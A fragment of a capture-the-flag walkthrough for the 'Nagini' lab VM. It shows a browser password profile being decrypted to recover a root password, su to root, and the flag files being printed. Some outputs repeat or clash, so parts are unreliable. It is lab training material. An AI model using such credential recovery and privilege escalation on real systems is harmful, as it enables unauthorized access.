2024-11-19 16:58:15,714 - WARNING - profile.ini not found in /root/jojo/192.168.2.124:8000
2024-11-19 16:58:15,715 - WARNING - Continuing and assuming '/root/jojo/192.168.2.124:8000' is a profile location
Website: http://nagini.hogwarts
Username: 'root'
Password: '@Alohomora#123'
su to root is executed with the recovered password.
snape@Nagini:/home/hermoine/bin$ su root
Password:
root@Nagini:/home/hermoine/bin# id
uid=0(root) gid=0(root) groups=0(root)
horcrux3.txt is displayed.
root@Nagini:/home/hermoine/bin# cd ~
root@Nagini: ls
horcrux3.txt
root@Nagini: cat horcrux3.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Medium
Machine Name: Nagini
Horcruxes Hidden in this VM: 3 horcruxes
You have successfully pwned Nagini machine.
Here is your third hocrux: horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}
Privilege escalation successful.
Flags
cat /home/hermoine/bin/horcrux2.txt
4: Helga Hufflepuff's Cup destroyed by Hermione
cat root.txt
Here is your third hocrux: horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}
# For any queries/suggestions feel free to ping me at email: time4ster@protonmail.com